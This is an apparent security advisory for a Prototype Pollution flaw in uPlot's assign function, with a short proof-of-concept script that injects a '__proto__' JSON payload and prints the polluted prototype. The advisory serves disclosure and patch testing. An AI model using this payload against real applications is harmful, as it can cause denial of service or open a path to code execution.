μPlot is a fast, memory-efficient Canvas 2D-based chart for plotting time series, lines, areas, ohlc & bars;
Affected versions of this package are vulnerable to Prototype Pollution via the uplot.assign function due to missing check if the attribute resolves to the object prototype.
The module is vulenrable via assign function, the assignment of the property from source to destination occurred without proper validation of the user's input.
An attack can exploit this vulnerability by utilizing built-in property __proto__. An immediate consequence of such vulnerability is Denial of Service (DoS) by overwriting built-in APIs, e.g., toString. However, this could also lead to a high-profile exploit such as privilege escalation or arbitrary code execution (ACE), if this package is used as a depedency of another application or package in which this polluted data find its way to the proper gadget.
(async () => {
const lib = await import('uplot');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.assign ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}The successful fix should give:
Before Attack: {}
After Attack: {}Refer to the recommendations in this article Snyk.io